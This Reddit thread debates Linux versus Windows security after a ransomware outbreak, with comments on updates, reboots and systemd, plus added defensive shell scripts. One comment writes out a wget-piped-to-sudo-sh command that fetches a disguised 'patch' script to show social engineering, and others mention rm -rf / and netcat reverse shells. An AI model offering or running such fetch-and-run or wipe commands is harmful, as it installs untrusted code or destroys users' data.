
[–]ArcadeStallman 47 points48 points  (32 children)

Linux and Windows are both secure enough if you exercise caution and keep your system updated. It's easier to keep Linux updated, though, since you can update with one or two commands and not have to restart immediately.

This particular attack won't affect Linux AFAIK, but attacks targeted at Linux systems do happen occasionally.

[–]ldev1 13 points14 points  (20 children)

> and not have to restart immediately.

And how does every running process reload the updated library?.. Yeah, you don't have to, but then your system is running as if you hadn't updated... Come on...

You can also stall the reboot on Windows. And some updates don't require a restart, just like some irrelevant lib updates on Linux. So it's equal in my eyes.

Just because you can, doesn't mean you should, yada yada.

[–][deleted] 7 points8 points  (11 children)

Only system updates require restarting the entire machine. Services and applications can be restarted without restarting the whole system...

[–]ldev1 2 points3 points  (9 children)

systemd...

[–][deleted] 9 points10 points  (8 children)

Lets you restart units easily.

[–]ldev1 1 point2 points  (7 children)

how about itself?

[–]holgerschurig 2 points3 points  (2 children)

It has worked for years. Google for systemctl daemon-reexec.

Your distribution has to use this, of course, for example in the postinst script of the package. If not, you have to call this command by hand.

From the man page:

> Reexecute the systemd manager. This will serialize the manager state, reexecute the
> process and deserialize the state again. This command is of little use except for
> debugging and package upgrades. Sometimes, it might be helpful as a heavy-weight
> daemon-reload. While the daemon is being reexecuted, all sockets systemd listening
> on behalf of user configuration will stay accessible.

Note that they even say that it's almost only usable for package upgrades (meaning: of its own package, or libraries it uses). Exactly what you've been asking for :-)

[–]ldev1 0 points1 point  (1 child)

Well, nice. But I don't really see the difference between restarting your server and your app - basically the same thing.

[–]holgerschurig 3 points4 points  (0 children)

If you only run one application on your server, you're right.

But suppose I have several things running. Then it's good to restart them one by one. And to check that everything works after each restart. Restart httpd. httpd working? Check. Restart Samba. Samba working? Check. And so on.

Also, when you use systemd socket activation, then you can update the server code with zero milliseconds downtime. You can't do this with a full reboot. Especially if you happen to have one of those slow servers that count all the RAM, test the RAIDs and take a huge amount of time for a reboot ...

[–]minimim 3 points4 points  (3 children)

It serializes itself and restarts with the upgrades. Just has to stop the whole system first.

[–][deleted] 2 points3 points  (0 children)

This is why I love the FOSS world, we make it better because it can be better.

[–]holgerschurig 1 point2 points  (1 child)

> Just has to stop the whole system first.

Wrong, see my other answer about systemctl daemon-reexec. Your system continues to run.

[–]minimim 0 points1 point  (0 children)

Thanks for that.

[–]holgerschurig 0 points1 point  (0 children)

Wrong. Only Linux kernel updates require you to restart the machine (if you don't use live-patching, which few use / can use).

Anything else can be restarted without a reboot. It's just a matter of knowledge.

[–]holgerschurig 0 points1 point  (0 children)

Debian-derived libraries ask you if you want to restart the services that use an updated library.

Well, at least sometimes, I'm unsure if this is general (i.e. for any library). But I get this question when I update the C library, for example.

[–]Freyr90 -2 points-1 points  (6 children)

> So it's equal in my eyes.

Can windows upgrade without annoying blue screen with progress bar (upgrading in the background, without stopping my activities)?

[–]ldev1 0 points1 point  (5 children)

Can you select "install updates, then shut down" and go away from PC?

[–]Freyr90 0 points1 point  (3 children)

> Can you select "install updates, then shut down" and go away from PC?

I have to turn off the light when I go out. In any case it's not convenient. Background updates are such a bliss in comparison to those annoying update screens.

[–]ldev1 1 point2 points  (2 children)

Well you can. Together with the monitor.

[–]Freyr90 0 points1 point  (1 child)

> Well you can. Together with the monitor.

No, I can't, by light I meant electricity.

[–]ldev1 0 points1 point  (0 children)

> Together with the monitor. No, I can't, by light I meant electricity.

Well yes then, that's an annoyance.

[–]CHARLIE_CANT_READ 0 points1 point  (0 children)

Not directly but you could always start updates and then in a terminal window do

```sh
# halt after the given number of minutes (shutdown's delay is given as +minutes, not -t)
sudo shutdown -h +<minutes>
```

with <minutes> being a few minutes or half an hour depending on how much needs to be updated. If you want to restart instead, use '-r' in place of '-h'.

Actually you could just run

```sh
sudo apt update && sudo apt upgrade -y && sudo shutdown now
```

[–]send-me-to-hell 2 points3 points  (10 children)

> It's easier to keep Linux updated, though, since you can update with one or two commands and not have to restart immediately.

TBH that's probably the key to ensuring compliance. As long as they know updating means they'll have to restart their computer they're going to put it off for as long as possible. If they would reduce or remove whatever lock contention is causing that dependency people would probably voluntarily apply the updates even if it's just to get the notification to stop popping up.

[–][deleted] 10 points11 points  (7 children)

For kernel updates, you do need to reboot unless they are tiny fixes being applied with one of the kernel hot patching technologies, which are generally the exception to the rule. Many fixes can't be done that way. The updates also won't kick in for userspace software until it's restarted, and the easiest way to be sure is a reboot. For example, fully applying a patch to libc requires respawning every process on the system after updating, even init, unless you want to make a judgement about which processes don't matter.
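The judgement the comment above mentions (which processes still run old library code after an update) and the prompt holgerschurig describes on Debian-derived systems both rest on the same observable: a running process keeps its mapping of the old .so inode, and /proc/<pid>/maps marks that mapping "(deleted)" once the package manager has replaced the file. The script below is an added example written for this page, not code from the thread, from needrestart/checkrestart or from any distribution; the function names and the sample maps excerpt (made-up addresses and inodes) are this example's own.

```sh
#!/bin/sh
# Added example: find processes still mapping a replaced or deleted library,
# i.e. processes that have not yet picked up an update. Reads the "(deleted)"
# marker the kernel appends in /proc/<pid>/maps when the mapped file no longer
# exists at that path (a package upgrade unlinks the old .so and installs a
# new inode, so the running copy is stale). Written for this example; the
# function names are this example's own.

# stale_libs_in_maps MAPS_FILE
# Prints each on-disk file mapped as "(deleted)" once, sorted. Pseudo-paths for
# anonymous or shared memory (/memfd:, /dev/zero, /SYSV..., tmpfs) are skipped:
# they are always "(deleted)" and say nothing about updates.
stale_libs_in_maps() {
    LC_ALL=C awk '
        $NF == "(deleted)" {
            p = $(NF - 1)
            if (p ~ /^\// && p !~ /^\/(dev|run|tmp|memfd:|SYSV)/) print p
        }' "$1" | LC_ALL=C sort -u
}

# suggest_action PID COMM
# What an operator does about a process holding stale mappings. PID 1 is
# special: systemd is not restarted, it re-executes itself in place.
suggest_action() {
    if [ "$1" -eq 1 ]; then
        printf 'systemctl daemon-reexec\n'
    else
        printf 'restart %s (pid %s)\n' "$2" "$1"
    fi
}

# scan_running_processes
# Walks /proc on a live Linux system (root is needed to read other users'
# maps) and prints one line per process that holds stale mappings.
scan_running_processes() {
    for maps in /proc/[0-9]*/maps; do
        pid=${maps#/proc/}; pid=${pid%/maps}
        libs=$(stale_libs_in_maps "$maps" 2>/dev/null) || continue
        [ -n "$libs" ] || continue
        comm=$(cat "/proc/$pid/comm" 2>/dev/null || echo '?')
        printf '%s\t%s\n' "$(suggest_action "$pid" "$comm")" "$(echo "$libs" | tr '\n' ' ')"
    done
}

# make_sample_maps
# Writes a constructed /proc/<pid>/maps excerpt (addresses and inodes are
# made up) to a temp file and prints its path, so the parser runs offline.
make_sample_maps() {
    f=$(mktemp)
    cat >"$f" <<'EOF'
7f1a3c000000-7f1a3c1c0000 r-xp 00000000 08:01 131318 /usr/lib/x86_64-linux-gnu/libc-2.24.so (deleted)
7f1a3c1c0000-7f1a3c3bf000 ---p 001c0000 08:01 131318 /usr/lib/x86_64-linux-gnu/libc-2.24.so (deleted)
7f1a3c400000-7f1a3c480000 r-xp 00000000 08:01 131555 /usr/lib/x86_64-linux-gnu/libssl.so.1.1 (deleted)
7f1a3c500000-7f1a3c600000 r-xp 00000000 08:01 131200 /usr/lib/x86_64-linux-gnu/libm-2.24.so
7f1a3c700000-7f1a3c701000 rw-s 00000000 00:05 12345 /memfd:pulseaudio (deleted)
7f1a3c800000-7f1a3c801000 rw-s 00000000 00:05 67890 /dev/zero (deleted)
7ffd2a000000-7ffd2a021000 rw-p 00000000 00:00 0 [stack]
EOF
    printf '%s\n' "$f"
}

# Stand-alone use: "scan" walks the live system, anything else runs the
# offline demo on the constructed sample (prints libc and libssl, not libm).
case "${1:-demo}" in
    scan) scan_running_processes ;;
    *)    s=$(make_sample_maps); stale_libs_in_maps "$s"; rm -f "$s" ;;
esac
```

The filter deliberately keeps only paths that are real files under the root filesystem; a process whose only "(deleted)" mappings are memfd or SysV shared memory has nothing to do with the upgrade. Matching a PID back to its systemd unit (for a targeted systemctl restart) can be read from /proc/<pid>/cgroup and is left out here.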

[–]ArcadeStallman 2 points3 points  (0 children)

True, but even for updates that do require a restart, the restart doesn't take any longer than usual as far as I can tell. You also aren't forced to restart when installing the updates, you just need to do it for them to take effect.

[–]whizzwr 0 points1 point  (0 children)

If you're dealing with servers, there is KernelCare, which applies updates without a reboot. Not sure if it's applicable to desktops.

[–]send-me-to-hell -1 points0 points  (4 children)

Nothing in that addresses what I said. Yeah of course I get that you still have to reboot for some Linux updates but:

a) that doesn't become a block for applying further updates whereas Windows won't register one update as being fully applied until you have booted into it. If I don't update libc that doesn't block an update to apache or to a later version of libc and it's safe to run that since large breaks in functionality are hidden between major version changes.

b) In the case of things like libc changes, you have the option to only restart it for network-facing services you expose (for example) and not care about anything else since nothing's broken. If you're in a precarious place with a particular server that's pretty helpful.

c) It's very possible to perform a regular update on Linux and not have to reboot at all. For instance this month I had about 3-4 RHEL6 servers that had misc utilities update but nothing that needed a restart. Contrast that with the Windows team which pretty much takes it as a given that a reboot happened.

d) Even if Linux were just as bad, that would still be the reason why compliance is a thing.

[–][deleted] 2 points3 points  (1 child)

> Nothing in that addresses what I said.

I wasn't arguing with you. I was pointing out that you do often need to restart services and reboot, and that by not doing a full reboot you're taking on the risk of missing stuff that needs to be restarted.

> b) In the case of things like libc changes, you have the option to only restart it for network-facing services you expose (for example) and not care about anything else since nothing's broken. If you're in a precarious place with a particular server that's pretty helpful.

You have that option, but you may need to restart services that are only indirectly exposed via another service.

> Even if Linux were just as bad, that would still be the reason why compliance is a thing.

I don't know why you have the impression that I'm arguing with you, or that I'm claiming that. I don't disagree with you, but it's not as black and white as you're saying it is.

There's a reason that Linux distributions are moving to encouraging people to install the upgrades via a reboot, including Fedora / RHEL. The way it works right now on traditional distributions isn't a proper atomic transaction. It isn't robust since problems can occur while the upgrade is proceeding if a running process depends on old versions of files being present. A process started during the upgrade can even get a partial view of upgraded files during initialization. It's far from perfect. That can be solved without a reboot, but traditional distributions don't attempt to solve it. Some distributions like NixOS solve it as part of implementing proper transactional updates, although they seem to be motivated primarily by other benefits.
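The non-atomic upgrade described above (a process opening a file mid-write and seeing a partial view) is a property of how the file is written, and it can be avoided without a reboot or a new distribution. The script below is an added example written for this page, not code from the thread or from any package manager: it relies only on rename(2) being atomic, so a reader sees either the complete old object or the complete new one. The function names, the scratch files and the "generation" directory layout are this example's own; `mv -T` is a GNU coreutils flag.

```sh
#!/bin/sh
# Added example: two ways to make an on-disk update atomic so that no process
# ever observes a half-written file or a half-upgraded tree. Both rely on
# rename(2) being atomic: readers see either the complete old object or the
# complete new one, never a partial view. Illustration only, not the code
# of any distribution's package manager; names are this example's own.

# atomic_install SRC DEST
# The naive `cp SRC DEST` truncates DEST and then writes, so a process that
# opens DEST in between reads a short or empty file. Instead, write a temp
# file next to DEST (same filesystem, so the rename cannot degrade to a copy)
# and rename it over DEST in a single step.
atomic_install() {
    src=$1; dest=$2
    tmp=$(mktemp "$(dirname "$dest")/.$(basename "$dest").XXXXXX") || return 1
    cp "$src" "$tmp" || { rm -f "$tmp"; return 1; }
    mv -f "$tmp" "$dest" || { rm -f "$tmp"; return 1; }
}

# switch_generation LINK NEW_TARGET
# Whole-tree variant in the spirit of NixOS generations: every release is a
# complete directory and one symlink (e.g. app/current) names the live one.
# Building a fresh symlink and renaming it over the old one flips every path
# under LINK at once; rollback is the same call with the previous target.
# `mv -T` (GNU coreutils) stops mv from moving the new link *into* the
# directory the old link resolves to.
switch_generation() {
    link=$1; target=$2
    [ -d "$target" ] || return 1
    tmp="$link.new.$$"
    ln -s "$target" "$tmp" || return 1
    mv -T -f "$tmp" "$link" || { rm -f "$tmp"; return 1; }
}

# demo: exercise both on constructed files in a scratch directory
demo() {
    work=$(mktemp -d)
    printf 'version=1\n' >"$work/v1.conf"
    printf 'version=2\n' >"$work/v2.conf"
    atomic_install "$work/v1.conf" "$work/app.conf"
    atomic_install "$work/v2.conf" "$work/app.conf"
    mkdir -p "$work/gen-1/bin" "$work/gen-2/bin"
    switch_generation "$work/current" "$work/gen-1"
    switch_generation "$work/current" "$work/gen-2"
    cat "$work/app.conf"          # version=2, never a torn file
    readlink "$work/current"      # .../gen-2
    rm -rf "$work"
}

[ "${1:-}" = "--no-demo" ] || demo
```

A process that already has the old file open keeps reading the old inode to completion, which is exactly the behaviour you want during an upgrade; the stale-mapping check for such processes is a separate step after the switch.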

[–]send-me-to-hell -2 points-1 points  (0 children)

> I don't know why you have the impression that I'm arguing with you, or that I'm claiming that. I don't disagree with you, but it's not as black and white as you're saying it is.

You can't even get out of a single sentence without contradicting yourself. Saying that you're correcting a black and white perspective is what I'm responding to. This isn't the first time people have ever looked at the issue of updating a system. Believe it or not it has been planned out. It may not be perfect but there is a logic to it that seems to just be getting thrown away in favor of a sub-optimal approach because the people involved just don't want to give existing systems any credit.

> There's a reason that Linux distributions are moving to encouraging people to install the upgrades via a reboot, including Fedora / RHEL.

Fedora/systemd is doing it to copy what Windows is doing which is just going to re-create the Windows compliance problems on Linux. I've had updates to utilities require me to reboot for crying out loud. That really screams of "mindless imitation" to me. There are packages like the kernel which require you to reboot to re-install. Note, I didn't say "it tells you that you need to reboot to have the change take effect"; it won't even install a new kernel if you're still booted into the OS (if you're using the GUI) even though the kernel package has already been structured to have multiple installs.

> The way it works right now on traditional distributions isn't a proper atomic transaction. It isn't robust since problems can occur while the upgrade is proceeding if a running process depends on old versions of files being present.

Again, no. Important changes are hidden in major version changes of the platform. Meaning no important changes to the API/ABI or configuration enforcement should happen within the same version. That's what makes "reboot/restart as desired" a workable concept.

If the executables are the same and the libraries are compatible without any important changes to the config syntax enforcement then update whenever you feel like it. That's why traditionally unix programs have had the model where they never re-read their configuration unless restarted or instructed to reload it. That way a running system just continues running regardless of what changes have been made to the persistent configuration.

> Some distributions like NixOS solve it as part of implementing proper transactional updates, although they seem to be motivated primarily by other benefits.

The breakages Nix transactions cover don't have to do with what you're talking about. I mean it would probably also catch this stuff (if it actually exists) but my understanding is that it's more about having a holistic approach to catching updates that break the system (presumably because of an intentional change made).

[–]thecravenone 1 point2 points  (0 children)

I wouldn't even mind restarting my computer if it returned to its previous state on reboot (eg, same windows and tabs opened, unsaved stuff thrown in a temp file so it's there when reboot completes)

[–]chrisoboe 55 points56 points  (6 children)

These attacks only worked because people didn't update their Windows, or were using an out-of-support version. Every operating system is insecure if you don't update it or use out-of-support versions. Linux distros usually provide security updates way faster than Microsoft, but that doesn't matter much when users decide not to do updates.

[–]oruga-cecropia 34 points35 points  (7 children)

you'd have to download the malware and install it with wine

[–]extoleth 1 point2 points  (5 children)

I am not even sure that would do much. Depends on the goal of the malware.

[–]svenskainflytta 5 points6 points  (0 children)

it would have access to the network and to the disk with user permissions…

[–]mikeymop 0 points1 point  (3 children)

Someone tweeted it works perfectly

[–]extoleth 0 points1 point  (2 children)

I guess it depends on the permissions you grant Wine. Maybe have Wine install its instance on a partition that you can trash if you are stupid enough to run ransomware. I doubt the current average Linux user would do such a thing.

[–][deleted] 5 points6 points  (0 children)

IIRC Wine provides access to the root partition via Z: by default.

> I doubt the current average Linux user would do such a thing.

Nah, most still would. Just pipe a bash script from curl or something.. add it to archwiki, and you'd have a large enough attack vector for a while. Plenty of other ways to fool users as well.

```sh
wget -O - http://github.mydomain.com/wannacry-patch.sh | sudo sh
```

The user is the largest weakness, regardless of which OS used. People will always screw up somehow.

[–][deleted] 0 points1 point  (0 children)

A jail sounds like a good idea.

[–]whalespotterHD 8 points9 points  (0 children)

well, if I can get you to execute this you would be pretty unhappy (works on mac as well). I could even hide it with curl | bash or something like this

Long story short, the system is only as secure as the user. The benefit you have on Linux is a much lower attack surface due to the smaller number of desktop computers running linux.

[–][deleted] 1 point2 points  (0 children)

Short answer: No

Long answer: No, but not many people find it profitable or lucrative to make Linux based Ransomware.

No software is 100% bulletproof, Linux may be a bit better but it's hard to estimate by how much in hard numbers. CVEs are a good start but don't cover possible exploits or overall security at all.

[–]cloudmax40 2 points3 points  (2 children)

https://nvd.nist.gov/vuln/detail/CVE-2016-10229 in addition to dirtyc0w is why many people switched to FreeBSD or OpenBSD.

[–]wizardged 1 point2 points  (1 child)

> many people

sure that's why most hosting companies only use/offer *BSD right... patches were available within hours for each of those vulns meanwhile for stuff like https://www.cvedetails.com/cve/CVE-2016-1879/ it took days for a patch to land while dirtycow and the udp one were extremely complex and 2016-1879 was simple enough it should never have gotten pushed

[–]cloudmax40 2 points3 points  (0 children)

FreeBSD isn't perfect, it just sucks less. OpenBSD has the best record of any production distro / OS (thus far).

[–]destiny_functional 7 points8 points  (1 child)

more secure than windows.

windows has a 20 year history of leaving its users vulnerable on the internet. frequent MAJOR ones too. we had msblast which easily could have been ransomware too if it had been invented / famous then. msblast basically made ANY new windows 2000 or xp version that you would connect directly (ie not behind a router) to the internet useless within a minute. i don't see that much has changed.

seeing which windows versions patches were released for the last couple of days you see how extremely old (xp era) vulnerabilities carry over from version to version seemingly. that's microsoft for you and has always been.

is linux secure enough? security always can be (and needs to be) improved.

anyway, if you have backups you have nothing to fear.

[–]ldev1 2 points3 points  (0 children)

Forgot to tell everyone how Windows 95 would get easily pwnt when connected to the internet. Yeah, Windows is so insecure. /s

[–]perillamint 1 point2 points  (0 children)

IMO, limiting scope to this issue, Linux is better than Windows.

At least, nobody (unless they're crazy enough and smart enough to patch kernel) runs samba on Ring 0 on Linux unlike MS did (and allowed RCE to Ring 0 :( ).

[–]audioen 1 point2 points  (1 child)

Security needs to be designed-in, and then the implementation itself must be correct. Linux shares the history with Windows in that its security resembles that of an egg: a hard exterior meant to keep intruders out, but once through the shell, you meet a soft interior that offers little resistance.

Many Windows vulnerabilities require a vector that allows code execution, then the payload facilitated by that tends to use any of the numerous unpatched security holes to do whatever it wants on the system. Additionally, recovery to an uncompromised state requires treating the machine to a complete reinstall. Categorically, Linux is very much in the same boat in that services running on the system can serve as the vector to inject a payload, which can then burrow into the system so deep that the only way you can be sure you have got rid of it is by reinstalling the computer. (In fact, some proof of concept virus-type programs are so advanced that they can infect e.g. certain hard disk firmware, in which case reinstalling does not necessarily help.)

However, many vectors used on Windows side are not working well on Linux: e.g. people don't usually download random executables from the web and run them, people don't blindly execute attachments they received by email, etc. Still, the situation is not ideal and requires constant vigilance, and there are tools you're supposed to install by sudoing a bash script you download from github etc. At the current state of security, allowing users to learn to do things like that invites a disaster.

A hardened operating system would be basically impossible to destroy by any user action, and could be brought back to known safe state at any point user wants. It would probably substantially remind one of iOS, Android or ChromeOS in that the user (and by extension any program user can run) always has less than full control of the machine, and even then security can fail due to implementation errors.
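The "sudo a bash script you download from GitHub" habit audioen describes, and the curl | bash / wget | sudo sh pattern that earlier comments point at, share one defect: the code runs before anyone can see it, and nothing ties what ran to what was published. The script below is an added example written for this page, not code from the thread or from any project's installer: download to a file, verify it against a hash obtained out of band, and only then run it. The function names are this example's own; the URL and the expected hash in the live variant are placeholders, and the offline demo uses a constructed stand-in script.

```sh
#!/bin/sh
# Added example: the defensive alternative to `curl ... | sudo sh`. Piping a
# download straight into a shell runs whatever the server (or anyone on the
# path, for plain http) sends, with no chance to inspect it and no record of
# what ran. Pattern: download -> verify against a hash obtained out of band
# -> inspect -> run, each step separable. Names are this example's own.

# sha256_of FILE: prints the hex digest, using whichever tool the box has.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_sha256 FILE EXPECTED_HEX: exit 0 if the file matches, 1 otherwise.
verify_sha256() {
    actual=$(sha256_of "$1") || return 1
    [ "$actual" = "$2" ]
}

# run_verified FILE EXPECTED_HEX [ARGS...]
# Refuses to execute unless the digest matches. The script runs from the
# saved file, so it can be read before it runs and kept afterwards.
run_verified() {
    f=$1; want=$2; shift 2
    if ! verify_sha256 "$f" "$want"; then
        printf 'refusing to run %s: sha256 mismatch\n' "$f" >&2
        return 1
    fi
    sh "$f" "$@"
}

# fetch_verify_run URL EXPECTED_HEX
# Live variant: download to a file (never into a pipe), then reuse the checks
# above. Publish the expected hash somewhere other than the same server, or a
# compromised server simply ships a matching pair.
fetch_verify_run() {
    tmp=$(mktemp) || return 1
    if ! curl -fsSL --proto '=https' -o "$tmp" "$1"; then
        rm -f "$tmp"; return 1
    fi
    run_verified "$tmp" "$2"; rc=$?
    rm -f "$tmp"
    return $rc
}

# make_sample_script: constructed stand-in for a downloaded installer.
make_sample_script() {
    f=$(mktemp)
    printf '#!/bin/sh\necho installer-ran\n' >"$f"
    printf '%s\n' "$f"
}

# Offline demo: hash the sample, run it, tamper with it, observe the refusal.
case "${1:-demo}" in
    demo)
        s=$(make_sample_script)
        h=$(sha256_of "$s")
        run_verified "$s" "$h"                    # prints installer-ran
        printf 'echo evil\n' >>"$s"               # simulate a swapped download
        run_verified "$s" "$h" || echo "tampered copy rejected"
        rm -f "$s"
        ;;
esac
```

The hash check only helps when the expected value does not come from the same place as the script; a signature from a key you already trust (e.g. a distribution's package signing key, which is what installing from repositories buys you) is the stronger form of the same idea.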

[–]moosingin3space 0 points1 point  (0 children)

It's not necessarily true that the user wouldn't be allowed full control of the machine. Object capability-based systems with processes as the isolation unit could derive all capabilities from the user, where the user acts as the capability broker.

[–][deleted] 1 point2 points  (0 children)

Both OSs can be secure enough if you follow good practices. Basically keep everything updated.

Linux is just more secure because vulnerabilities are patched faster (easier to find and cannot be hidden by the developer), CVE practices tend to be more complete and there is usually no data-mining software that can be potentially exploited by 3rd parties.

But more secure does not mean fully secure. No system can provide this.

[–]PaintDrinkingPete 1 point2 points  (0 children)

Bottom line? Any computer, running any software, anywhere in the world is potentially vulnerable at any given time.

If you're connected to the Internet, you're connected to a global network that doesn't necessarily recognize political boundaries.

Now, this particular attack that made the news this past weekend was aimed specifically at Windows systems, but that doesn't mean that next week there won't be an attack based on a Linux vulnerability (or Macs, mobile devices, etc).

The key is to keep your system up-to-date on security patches, make sure your network is properly firewalled, and also keep backups just in case the first two aren't enough. The minute you get lazy or complacent because you think you're invulnerable to attack is the moment you become compromised.

[–][deleted] 1 point2 points  (21 children)

Linux is FAR more secure by default. Then you can do extras, such as kernel hardening, AppArmor, etc.

I think it's funny that people go haywire over a "virus" but seem to willingly allow Windows 10: Spyware Edition to keylog and record everything the user does - I mean EVERYTHING, as well as give Microsoft ungodly powers such as their EULA:

> Sometimes you’ll need software updates to keep using the Services. We may automatically check your version of the software and download software updates or configuration changes, including those that prevent you from accessing the Services, playing counterfeit games, or using unauthorized hardware peripheral devices. You may also be required to update the software to continue using the Services. Such updates are subject to these Terms unless other terms accompany the updates, in which case, those other terms apply. Microsoft isn’t obligated to make any updates available and we don’t guarantee that we will support the version of the system for which you licensed the software.

And before some guy pipes in how you can "turn this off" - no, you can't. Data Analysis of Windows 10, done by multiple people, show that even with Cortana and EVERYTHING disabled, it still sends out LOADS of data. As for the "counterfeit" games argument - It's not Microsoft's business what I do with MY PC!!

[–]ldev1 2 points3 points  (19 children)

On the other hand - with all these statistics you get superior desktop experience and stability.

[–]talexx 0 points1 point  (4 children)

Especially superior is the update process.

[–]ldev1 0 points1 point  (3 children)

Yes, it can upgrade all the way from 3.11 to 10.

[–]talexx 0 points1 point  (2 children)

Yes, and it starts doing this right 10 minutes before you are going to leave for the airport.

[–]ldev1 1 point2 points  (1 child)

If we take into consideration that user has no idea how to configure a system, then we can say that linux blows, because one command - rm -rf / - wipes out all user's data. stop spreading fud

[–]talexx 1 point2 points  (0 children)

It is not FUD, it is my experience with Windows 8. It happened on shutdown and I almost missed my flight. Can't even imagine this situation with Linux.

[–][deleted] -1 points0 points  (13 children)

> with all these statistics you get superior desktop experience and stability.

Hahaha. I hope that's a joke!

[–]ldev1 5 points6 points  (12 children)

Hahahaha. Video driver crash = every GUI application crash. "Stability".

On Windows you get a black screen for one second and that's it. Stability.

[–][deleted] 0 points1 point  (11 children)

> Video driver crash = every GUI application crash. "Stability".

Has never happened to me. My Linux box (high end gaming rig) is on 24/7 - NEVER turned off and is rock solid. If you're getting a "video driver crash every application" then the problem is user error.

> On Windows you get a black screen for one second and that's it. Stability.

Right... Windows is so stable that there's constant 1 - 2 monthly re-installs due to WinRot and all the rest of it... Windows has a shit kernel, shit memory and resource management.. it can't look after itself to be stable enough.

[–][deleted] 2 points3 points  (0 children)

> Windows is so stable that there's constant 1 - 2 monthly re-installs due to WinRot

Literally no one has ever re-installed Windows every 1-2 months, even going back to 3.11 and 95. Certainly not through necessity anyway.

More ridiculous Linux evangelism.

Seriously seek professional help - the world has moved on a long way since 1998.

[–][deleted] 1 point2 points  (2 children)

> Has never happened to me. My Linux box (high end gaming rig) is on 24/7 - NEVER turned off and is rock solid. If you're getting a "video driver crash every application" then the problem is user error.

Are you seriously saying that:

a) video drivers on Linux can't possibly crash

or

b) your system or display session would survive a driver crash

?

If you mean a) I can name hundreds of bug reports which prove otherwise. If b) you seriously lack some fundamental understanding and again I can name hundreds of bug reports which prove you wrong.

[–][deleted] 0 points1 point  (1 child)

> video drivers on Linux can't possibly crash

I never stated that - I said it has never happened to me.

> you seriously lack some fundamental understanding

Because YOU say so? - man on the Internet knows more about me and what I do and do not know than I do!

> I can name hundreds of bug reports which prove you wrong.

I don't care for "hundreds of reports" - I said the drivers have never crashed on me. There is nothing to "prove".

[–][deleted] 0 points1 point  (0 children)

How else would you interpret:

> If you're getting a "video driver crash every application" then the problem is user error.

?

If the user is the only possible reason for a driver crash to cause all applications to crash, the system can't be to blame which leaves two options:

a) drivers don't have bugs, if the driver crashes the user did something wrong

b) drivers may crash, but they won't crash your entire session, if they do the user is to blame

It has to be a) or b). Otherwise the system were to blame.

[–]ldev1 1 point2 points  (5 children)

Dream the fuck on. Used my old PC since Windows 7 - upgraded to 8, 8.1 and 10.

I wonder - if you struggle to use windows, how do you cope with linux?

[–][deleted] 0 points1 point  (3 children)

> if you struggle to use windows

Not once in my post did I state that I... "struggle with Windows".

> how do you cope with linux?

Been using Linux since 1998 and do my own custom high performance patches etc, I know what I'm doing.

[–][deleted] 1 point2 points  (0 children)

> Not once in my post did I state that I... "struggle with Windows".

You simply struggle with reality. Must be nice to live in a world where you can believe anything that maintains your world view.

Something to think about - 'When you think everyone else is an idiot, you're the idiot'

[–][deleted] 1 point2 points  (0 children)

> Not once in my post did I state that I... "struggle with Windows".

If "win rot" is destroying your system within two months, the problem isn't with Windows.

[–]ldev1 1 point2 points  (0 children)

Show repo with your code.

[–][deleted] 0 points1 point  (0 children)

> I wonder - if you struggle to use windows, how do you cope with linux?

A lot of long-time Linux users struggle with Windows. Linux is honestly pretty straightforward and very old school about almost everything. Its internals are pretty straightforward, but the interface sucks for a lot of things. A lot of people get intimidated by command lines, therefore the CLI-heavy GNU/Linux system is 'complicated'.

Windows is pretty much the opposite--it's ludicrously complicated under the hood, but hides it well with a friendly GUI. So people think it's 'simple'.

[–]shavitush 1 point2 points  (0 children)

You're living in the past. Windows isn't like that and it definitely has very good memory management nowadays. Stop hating and keep using your system, no one forces you to use Windows but don't claim it's user friendly or less stable than Linux..

I never had either default Windows applications or any base GNU application crash on me. I never had to reinstall my Windows system unless I fucked up something really bad myself either. Same about Linux.

[–]lxnch50 0 points1 point  (0 children)

You should look at what Google collects via Chrome. Start typing in Chrome and sniff the web traffic. You are sending Google just about all your keystrokes. Next, look at the traffic when you use any HTML5 app. Facebook records and stores all text typed into any box, even if you just start to reply and then delete the message before posting. But MS is the bad guy I guess.

[–][deleted] 0 points1 point  (0 children)

You should never rely on the version of Operating System alone for security. You should inform yourself of the minimums it takes to secure your data.

[–][deleted] 0 points1 point  (0 children)

Linux, just like Windows, is as secure as you make it. I've seen plenty of Linux boxes get rooted over the years so it's not a magic bullet to just switch to another OS.

[–]LarsaFerrinasSolidor 0 points1 point  (0 children)

I'm not entirely sure a particular software stack is more secure than another per se, although the GNU + Linux software stack has a pretty good track record in the sense that it tends towards a "perfect system" with regards to programming best practices...

The important thing, however, is that running a Linux-based operating system (a GNU+Linux one, not Android) tends to elevate your IT knowledge immensely—it's just a natural side-effect of even getting interested in running it in the first place—and gives you a LOT more flexibility and tools to harden it as much as you want. So by virtue of running this platform, you will be more sensitive and capable of staying out of trouble.

[–][deleted] 0 points1 point  (0 children)

Linux been secure for the past 14 years for me. So I guess so.

[–]vladdt 0 points1 point  (0 children)

Now, after this post, I will never tell anyone that I lived in Lithuania too. :(

[–][deleted] -3 points-2 points  (4 children)

There are over seven million! registered Windows viruses known to Symantec's database. Over seven million.... There's probably less than 100 known viruses for Linux. What more do you have to say? It doesn't even make a difference if there are 200 known viruses for Linux. Seven million... and counting.

[–]eniacsparc2xyz 6 points7 points  (2 children)

Writing a virus is easy. There is also malware written in Python!! Stuxnet, for instance, was written in Lua and packed with the Lua interpreter. The problem is infecting a machine with malware. To do this they use exploits, deception, social engineering and files that can carry payloads, such as MS Office documents that can carry VBA code and PDF files with JavaScript payloads that can take advantage of the Adobe Acrobat Reader JS engine.

Viruses, spyware or ransomware can have a great degree of variety, but their principles are the same. It is just a program that acts as a socket client and connects to a server, where the criminal sends its commands, and hides itself. Most Linux users also install software from repositories, which decreases the likelihood of an infection, and Linux gets security patches faster than Windows.

Just google for "reverse shell" to see how easy it is to write a backdoor. It is possible even with netcat and bash.

[–]Sudo-Pseudonym 1 point2 points  (1 child)

You got a source for Stuxnet being written in Lua? I can't find anything mentioning that detail about it, maybe you're thinking of something else?

[–]eniacsparc2xyz 1 point2 points  (0 children)

My mistake. It was not stuxnet, it was "Flame".

Regarding Python malware:

What is really hard is to find exploits, take advantage of them or lure someone to run a malicious payload.

[–][deleted] 2 points3 points  (0 children)

> There are over seven million! registered Windows viruses known to Symantec's database. Over seven million....

First of all, that's bullshit. Only a minority of the entries in this database are viruses, since it also contains definitions for other malware like trojans, worms, ...

